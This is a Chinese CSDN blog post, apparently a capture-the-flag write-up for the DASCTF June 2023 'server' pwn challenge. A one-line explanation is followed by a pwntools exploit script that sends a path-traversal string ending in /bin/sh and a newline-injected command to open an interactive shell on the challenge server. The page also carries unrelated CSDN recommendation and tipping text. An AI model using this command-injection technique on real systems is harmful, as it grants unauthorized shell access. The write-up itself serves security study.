DASCTF 2023六月挑战赛 二进制专项 server

最新推荐文章于 2024-03-13 12:11:26 发布
最新推荐文章于 2024-03-13 12:11:26 发布
阅读量297 收藏
点赞数 1
分类专栏: wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/131054391
版权

DASCTF 2023六月挑战赛 二进制专项 server

在这里插入图片描述

在这里插入图片描述
两个函数的rbp - 0x40这里是重复使用的,漏洞点出在system可以执行输入的,14DA过滤字符,但是可以复用空间,然后\n分割命令即可

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './pwn_7'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25959)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def dbgg():
    raw_input()

menu = 'Your choice >> '

def diff(key):
    r.sendlineafter(menu, '1')
    r.sendlineafter('Please input the key of admin : ', key)

def sys(p):
    r.sendlineafter(menu, '2')
    r.sendlineafter('Please input the username to add : \n', p)

dbgg()

diff('../../../../../..//bin/sh')

p1 = b"'\n"
sys(p1)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQLSERVER_后台导入二进制数据方法.doc
08-05
SQLSERVER 后台导入二进制数据方法 SQL Server 是一种功能强大的关系数据库管理系统,它提供了多种方式来导入二进制数据,包括使用 BULK INSERT 指令、使用 OPENROWSET 函数、使用 XML 等。但是在某些情况下,我们...
SQL Server中实现二进制与字符类型之间的数据转换
09-11
在SQL Server数据库中,二进制数据类型(如varbinary)和字符数据类型(如varchar)之间的转换是非常常见的操作,特别是在处理数据导入导出、格式转换或者解析特殊格式的二进制数据时。本文主要讨论如何在SQL Server...
DASCTF 2023六月挑战赛二进制专项 pwn
m0_63437215的博客
07-03 431
DASCTF 2023六月挑战赛二进制专项 pwn
DASCTF 2023六月挑战赛二进制专项 PWN
weixin_51890658的博客
06-05 401
通过ida分析和gdb调试i在rbp-c中,它是int类型占4字节,还有两次格式化字符串漏洞,可通过这两次修改为i的值,第一次是把args参数链修改为i地址,第二次是修改i值即可再次使用格式化字符串漏洞。因为有堆溢出和uaf,可以伪装fastchunk,通过gdb调试0x602095地址的值为0x7f,可伪装。64位,也给了libc库,开了canary和pie地址随机 拖入ida看存在格式化字符串漏洞,有3次。64位的,给了libc库,开了canary,拖入ida分析,在edit函数中存在堆溢出。
DASCTF 2023六月挑战赛 | 二进制专项 Reverse
ULGANOY的博客
03-13 910
DASCTF 2023六月挑战赛 | 二进制专项 Reverse
DASCTF 2023六月挑战赛二进制专项ez_exe复现
m0_75098930的博客
07-02 201
有点小搞,python逆向,最开始从pyc里还原出源码的时候不太能看懂,就只能看懂几个读写的操作,当时没太懂意思,然后运行程序后发现bin1变成了exe,提示是用exe来解密bin2,脑子抽了,没懂意思,结果是直接patch原exe的bin1成bin2,以这种方式解密,解密完bin2就是一个简单的xxtea。除了盖delta的数值外,解密的轮数也变了,直接用52/n(找了好久,小搞)
DASCTF 2023六月挑战赛 二进制专项 easynote
z1r0的博客
06-05 361
uaf,堆溢出,2.23。
[DASCTF 2023六月挑战赛二进制专项] 5个pwn
weixin_52640415的博客
06-04 1297
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
DASCTF Apr.2023 X SU战队2023开局之战 pwn
m0_63437215的博客
04-24 590
DASCTF Apr.2023 X SU战队2023开局之战
2023DASCTF六月挑战赛二进制专项--reverse
qq_73505302的博客
12-26 299
找到:https://github.com/google/pytype/blob/main/pytype/pyc/magic.py(不同版本python对应的magic number。如果在网络上查询相关的API的话可以很清楚的了解到这些API函数在一起调用最终会实现屏幕图像截取的功能。既然这个加密的bmp的每一个字节进行的都是异或,那我们可以将前两个字节异或看看。的第2个和第3个字符,按照这个序列,我们向后将密钥向后延申看看后面的情况如何。我们随便打开一个BMP类型的文件,用010看看。
Python如何向SQLServer存储二进制图片
12-17
需求是需要用python往 SqlServer中的image类型字段中插入二进制图片 核心代码,研究好几个小时的代码: 安装pywin32,adodbapi image_url = "图片链接" try: image_result = session.get(url=image_url, headers=...
Labview 16进制转换为二进制
09-30
适用于在通讯时可以用到的实例,16进制转换为二进制,已经测试OK.
excel_check.py
06-24
excel_check.py
斑马线人行横道检测数据集VOC+YOLO格式793张1类别.7z
06-24
数据集格式:Pascal VOC格式+YOLO格式(不包含分割路径的txt文件,仅仅包含jpg图片以及对应的VOC格式xml文件和yolo格式txt文件) 图片数量(jpg文件个数):793 标注数量(xml文件个数):793 标注数量(txt文件个数):793 标注类别数:1 标注类别名称:["cross"] 每个类别标注的框数: cross 框数 = 805 总框数:805 使用标注工具:labelImg 标注规则:对类别进行画矩形框 重要说明:暂无 特别声明:本数据集不对训练的模型或者权重文件精度作任何保证,数据集只提供准确且合理标注 更多信息:https://blog.csdn.net/FL1623863129/article/details/139939404
基于Django毕业设计选题管理系统毕业源码案例设计.zip
06-24
包含源码,数据库,演示视频,使用说明,环境安装说明。经导师指导并认可通过的高分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业,项目都经过严格调试,确保可以运行! 包含源码,数据库,演示视频,使用说明,环境安装说明。经导师指导并认可通过的高分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业,项目都经过严格调试,确保可以运行! 包含源码,数据库,演示视频,使用说明,环境安装说明。经导师指导并认可通过的高分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业,项目都经过严格调试,确保可以运行! 包含源码,数据库,演示视频,使用说明,环境安装说明。经导师指导并认可通过的高分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业,项目都经过严格调试,确保可以运行!
Laravel发票系统及源码+可做作业毕设等参考
06-24
Laravel发票系统及源码 项目简介 发票系统是一个基于Web的计费系统实现,使用Laravel框架开发。同样,Postgres被用于实现实时数据库。发票系统与非自动化系统相比,可以更高效地管理现金流。该系统为终端用户提供了一个简单且交互式的界面,用于执行公司和发票的CRUD操作。此外,它遵循MVC架构,并使用服务-仓库模式。同时,它使用请求类来验证输入字段。此外,该系统还实现了日志记录和模块化代码的概念。 系统功能 1.CRUD操作:支持公司和发票的创建、读取、更新和删除操作。 2.搜索、分页和排序:提供了强大的数据管理功能。 3.基于角色的访问控制:只有管理员有权执行公司和发票的CRUD操作,其他用户只能查看自己公司的发票。 活动日志查看:使用Laravel Auditing包实现日志记录功能。 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
web网页html版基于pytorch的墙体瑕疵裂缝识别-含图片数据集.zip
最新发布
06-24
本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本,环境需要自行配置。 或可直接参考下面博文进行环境安装。 https://blog.csdn.net/no_work/article/details/139887346 安装好环境之后, 代码需要依次运行 01数据集文本生成制作.py 02深度学习模型训练.py 和03html_server.py 数据集介绍,下载本资源后,界面如下: 数据集文件夹存放了本次识别的各个类别图片。 运行01数据集文本制作.py文件,会就读取数据集下每个类别文件中的图片路径和对应的标签 运行02深度学习模型训练.py就会将txt文本中记录的训练集和验证集进行读取训练,训练好后会保存模型在本地 训练完成之后会有log日志保存本地,里面记录了每个epoch的验证集损失值和准确率。 运行03html_server.py就可以生成与网页交互的url了 然后我们复制这个url(http://127.0.0.1:4399)在本机电脑的网页上打开,或手动输入这个url,切记不要输错 这
深入SQL的JOIN操作:构建复杂查询的桥梁
06-24
SQL(Structured Query Language,结构化查询语言)是一种专门用来管理和操作关系型数据库的编程语言。SQL的主要功能包括查询、更新、插入和删除数据库中的数据。 SQL的关键特点包括: 1. **声明性**:SQL使用声明性语法,指定要执行的操作,而不是如何执行。 2. **数据操作**:SQL提供了数据查询功能,通过`SELECT`语句可以检索数据。 3. **数据定义**:SQL允许用户定义和修改数据库的结构,使用`CREATE`、`ALTER`和`DROP`等语句。 4. **数据控制**:SQL提供了数据访问控制功能,通过`GRANT`和`REVOKE`语句管理用户权限。 5. **事务控制**:SQL支持事务处理,确保数据库操作的原子性、一致性、隔离性和持久性(ACID属性)。 6. **并发控制**:SQL通过锁和多版本并发控制(MVCC)等机制,支持多用户环境下的数据一致性和完整性。 7. **数据完整性**:SQL支持各种数据完整性约束,如主键、外键、唯一约束和检查约束等。
2023 SpringCloudAlibaba分布式微服务 物流系统 实战视频教程 下载 因为太大存百度云盘3.zip
06-24
下面目录只是部分
二进制部署kube-apiserver,版本是1.23.1
07-12
对于二进制部署 Kubernetes 的 kube-apiserver,你可以按照以下步骤部署版本为 1.23.1 的 kube-apiserver: 1. 下载 kube-apiserver 二进制文件: ```shell wget ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值